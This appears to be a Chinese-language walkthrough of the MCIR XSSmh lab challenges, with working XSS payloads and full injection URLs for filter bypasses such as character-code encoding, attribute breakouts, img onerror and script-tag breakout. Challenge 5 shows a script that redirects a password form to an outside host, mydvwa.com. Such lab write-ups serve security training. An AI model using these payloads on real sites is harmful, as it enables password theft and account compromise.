MCIR-XSSMH:challenge0

页面:/mcir/xssmh/challenges/challenge0.php

1、验证是否存在XSS注入:<script>alert(1)</script>

2、存在XSS注入,要求是弹出“Hello World”,调整注入内容:<script>alert("Hello, world!")</script>url如下:

http://mcir.pte.com/mcir/xssmh/xss.php?location=body&inject_string=%3Cscript%3Ealert%28%22Hello%2C+world%21%22%29%3C%2Fscript%3E&submit=Inject%21

效果图如下

MCIR-XSSMH:challenge1

页面:/mcir/xssmh/challenges/challenge1.php

1、验证是否存在XSS注入:<script>alert(1)</script>

2、由于界面输入要求是对单引号和双引号进行处理,再不调整输入条件内容验证:

<script>alert("Hello, world!")</script>
http://mcir.pte.com/mcir/xssmh/xss.php?location=body&sanitization_level=medium&sanitization_params=%22%2C%27&sanitization_type=keyword&inject_string=%3Cscript%3Ealert%28%22Hello%2C+world%21%22%29%3C%2Fscript%3E&submit=Inject%21

界面无弹窗,当输入非数值时,界面输入进行了转义,把字符串进行ASCII转码如下:

  • 十进制ASCII码转换成字符:String.fromCodePoint(num1[, …[, numN]])、String.fromCharCode(num1[, …[, numN]])。fromCodePoint(), fromCharCode()两个都是String的静态方法,所以直接使用,不需要实例化。两者的主要区别是:fromCharCode() 出现的早,可以处理常用的字符编码;fromCodePoint() ES2015出现的,可以处理高位编码。

  • 字符转换成十进制ASCII码:

    'A'.charCodeAt() // 65
    'a'.charCodeAt() // 97
    'Z'.charCodeAt() // 90
    'z'.charCodeAt() // 122
    

把字符串进行ASCII转码之后的输入如下:

<script>a=String.fromCodePoint(72,101,108,108,111,32,87,111,114,108,100,33);alert(a)</script>

完整的url如下:

http://mcir.pte.com/mcir/xssmh/xss.php?location=body&sanitization_level=medium&sanitization_params=%22%2C%27&sanitization_type=keyword&inject_string=%3Cscript%3Ea%3DString.fromCodePoint%2872%2C101%2C108%2C108%2C111%2C32%2C87%2C111%2C114%2C108%2C100%2C33%29%3Balert%28a%29%3C%2Fscript%3E&submit=Inject%21

界面效果如下:

MCIR-XSSMH:challenge2

页面:/mcir/xssmh/challenges/challenge2.php

1、在Injection String输入内容:<script>alert("Hello WelTest")</script>完整URL:

http://mcir.pte.com/mcir/xssmh/xss.php?location=body&persistent=on&inject_string=%3Cscript%3Ealert%28%22Hello+WelTest%22%29%3C%2Fscript%3E&submit=Inject%21

2、再URL输入链接:

http://mcir.pte.com/mcir/xssmh/pxss.html

MCIR-XSSMH:challenge3

页面:http://mcir.pte.com/mcir/xssmh/challenges/challenge3.php

当前实验的尖括号被移除"<,>",因此不能使用

weltest" onclick="javascript:alert('Hello WelTest');

请求url内容如下:

http://mcir.pte.com/mcir/xssmh/xss.php?sanitization_level=high&sanitization_type=keyword&sanitization_params=%3C%2C%3E&query_results=all_rows&error_level=verbose&inject_string=weltest%22+onclick%3D%22javascript%3Aalert%28%27Hello+WelTest%27%29%3B&location=attribute_double&custom_inject=&submit=Inject%21


点击"weltest"值所在的输入框弹出:

出现上图所示,表明注入成功。

MCIR-XSSMH:challenge4

页面:/mcir/xssmh/challenges/challenge4.php

Injection String输入框过滤了script值,输入信息中存在script字段,程序会进行转义处理。因此不能使用

<img src="knownsec" onerror=alert('HelloWelTest')>

URL请求如下:

http://mcir.pte.com/mcir/xssmh/xss.php?sanitization_level=high&sanitization_type=keyword&sanitization_params=script&query_results=all_rows&error_level=verbose&inject_string=%3Cimg+src%3D%22knownsec%22+onerror%3Dalert%28%27HelloWelTest%27%29%3E+&location=body&custom_inject=&submit=Inject%21

页面效果如下:

页面注入源码如下:

至此,通过插入html元素,并给元素造错误属性,来实现页面注入。

MCIR-XSSMH:challenge5

页面:/mcir/xssmh/challenges/challenge5.php

当前实验目标是:调整密码提交的action,让密码不被提交到一个正确的地方。通过在页面进行一个正常的输入“123456789”,请求url如下:

http://mcir.pte.com/mcir/xssmh/xss.php?custom_inject=%3Cform+action%3D%22xss.php%22+name%3D%22xssform%22%3EEnter+password%3A%3Cinput+type%3D%22password%22+name%3D%22password%22+%2F%3E%3Cinput+type%3D%22submit%22+%2F%3E%3C%2Fform%3E*INJECT*&inject_string=123456789&submit=Inject%21

界面输出如下:

分析正常响应页面元素及响应方法:

当前页面提交form的action在上图框选出来,通过分析form构造请求输入如下:

<script>document.getElementsByName('xssform')[0].aciton='http://mydvwa.com'</script>

页面源码如下:

该脚本执行结果如下:

如果http://mydvwa.com存在监听器,一旦出现这个操作,用户在界面输入的密码会被传输到http://mydvwa.com该网站中,可以被黑客利用。

MCIR-XSSMH:challenge6

页面:/mcir/xssmh/challenges/challenge6.php

解决方法与“MCIR-XSSMH:challenge0”解决方法一样。不一致的地方如下图所示:

需要输入内容如下:

</script><script>a=String.fromCodePoint(72,101,108,108,111,32,87,111,114,108,100,33);alert(a)</script>

URL内容如下:

http://mcir.pte.com/mcir/xssmh/xss.php?location=javascript&sanitization_level=reject_high&sanitization_params=%22&sanitization_type=keyword&inject_string=%3C%2Fscript%3E%3Cscript%3Ea%3DString.fromCodePoint%2872%2C101%2C108%2C108%2C111%2C32%2C87%2C111%2C114%2C108%2C100%2C33%29%3Balert%28a%29%3C%2Fscript%3E&submit=Inject%21

注入源码展示如下:

效果图如下:

MCIR-XSSMH:challenge7

页面:/mcir/xssmh/challenges/challenge7.php

输入正常值“Hello WelTest”查看页面源码:

参考“MCIR-XSSMH:challenge3”方法进行尝试:

weltest" accesskey="X" onclick="javascript:alert('Hello WelTest');
weltest" accesskey="L" onclick="alert('Hello')

accesskey 属性规定激活(使元素获得焦点)元素的快捷键。各种浏览器下accesskey快捷键的使用方法:

  • IE浏览器:按住Alt键,点击accesskey定义的快捷键(焦点将移动到链接),再按回车.

  • FireFox浏览器:按住Alt+Shift键,点击accesskey定义的快捷键.

  • Chrome浏览器:按住Alt键,点击accesskey定义的快捷键.

  • Opera浏览器:按住Shift键,点击esc,出现本页定义的accesskey快捷键列表可供选择.

  • Safari浏览器:按住Alt键,点击accesskey定义的快捷键.

渗透测试:XSS实验集合相关推荐

  1. 渗透测试面试问题集合(转载自己看,链接在开头)

    红蓝对抗一些经验 文章的原链接 一.思路流程 1.信息收集 a.服务器的相关信息(真实ip,系统类型,版本,开放端口,WAF等) b.网站指纹识别(包括,cms,cdn,证书等),dns记录 c.wh ...

  2. 如何进行渗透测试XSS跨站攻击检测

    国庆假期结束,这一节准备XSS跨站攻击渗透测试中的利用点,上一节讲了SQL注入攻击的详细流程,很多朋友想要咨询具体在跨站攻击上是如何实现和利用的,那么我们Sinesafe渗透测试工程师为大家详细的讲讲 ...

  3. 网络安全渗透测试使用工具集合及使用文档整理

    渗透测试标准:PTES 社工方法论:SocialEngineer 敏感信息收集工具:MaiInt 被动情报收集工具:Shodan.Google Hacking.ZoomEye.whois.nslook ...

  4. 渗透测试-XSS漏洞检测

    防护绕过 关于XSS漏洞的基础理解,请访问另一篇博文:https://blog.csdn.net/weixin_39190897/article/details/86005088. xss漏洞很容易被 ...

  5. 怎样利用超图客户端打点_渗透测试——XSS利用工具BeEF攻击演示

    跨站脚本漏洞(Cross-site scripting,通常简称为XSS)发生在客户端,可被用于进行窃取隐私.钓鱼欺骗.窃取密码.传播恶意代码等攻击.XSS攻击使用到的技术主要为HTML和Javasc ...

  6. 渗透测试-xss安全防御之href输出和js输出

    xss安全防御之href输出和js输出 文章目录 xss安全防御之href输出和js输出 1. xss之href输出 2. xss之js输出 总结 1. xss之href输出 进行xss之href输出 ...

  7. 渗透测试入门24之渗透测试参考书、课程、工具、认证

    白帽子渗透测试入门资源:参考书.课程.工具.认证文章目录 前言 名词解析 Pwk课程与OSCP证书 CTF 工具 参考书 相关文献推荐 资源打包前言 初入渗透测试领域,过程中遇到不少错综复杂的知识,也 ...

  8. 渗透测试|网络安全常用靶场

    搭建教程网络上随便一搜一大堆,这里就不再赘述 vulhub 免费开源漏洞靶场 www.vulhub.org vulnhub 国外的一个靶场,难度中上(类似于真实渗透环境) https://www.vu ...

  9. 【CyberSecurityLearning 76】DC系列之DC-7渗透测试(Drupal)

    目录 DC-7靶机渗透测试 1.信息收集 1.1 扫描开放的端口 1.2 访问WEB站点 2.登录ssh 3. 提权(suid提权) 3.1 exim4提权 4.drush 命令对任意用户密码进行更改 ...

最新文章

  1. stagefright omx小结
  2. C语言:L1-031 到底是不是太胖了 (10分)(解题报告)
  3. .NET Core IdentityServer4实战 第Ⅴ章-单点登录
  4. 第一百三十七期:一个简单的小案例带你理解MySQL中的事务
  5. 有必要考国二mysql_计算机二级必须要考吗
  6. WinServer2008R2搭建和授权DHCP服务器详解
  7. iOS shell脚本打包
  8. 【空间分析】4 探索性分析
  9. poj 1328 贪心+qsort
  10. 【UVA1592】Database (字符串读入技巧和map的使用)
  11. 硬件文章远程视频监控
  12. A到Z的unicode的编码的大小
  13. Java版的TxT转换器下载_TXT转MP3格式转换器
  14. 再见,深圳!再见,腾讯!
  15. 从0到1,搭建经营分析体系
  16. python骰子游戏分析_两个骰子的Python概率骰子游戏
  17. 浅析装备制造业的项目管理智能化
  18. VScode常用插件下载
  19. Android从驱动到应用开发实例分析
  20. 中国信息安全测评中心-自主原创测评

热门文章

  1. 百度免费开源 API 管理平台 YAPI
  2. JS 和 JQuery 使用demo
  3. cf 940E Cashback
  4. 中软国际java 笔试 面试题
  5. 【Javascript】javascript 中的指针
  6. RSA+Base64加密
  7. jquery base64加密
  8. 无人机学习笔记之电池篇
  9. 用互联网对接传统行业,改良还是颠覆?
  10. 基于Python命令行的NBA文字直播小工具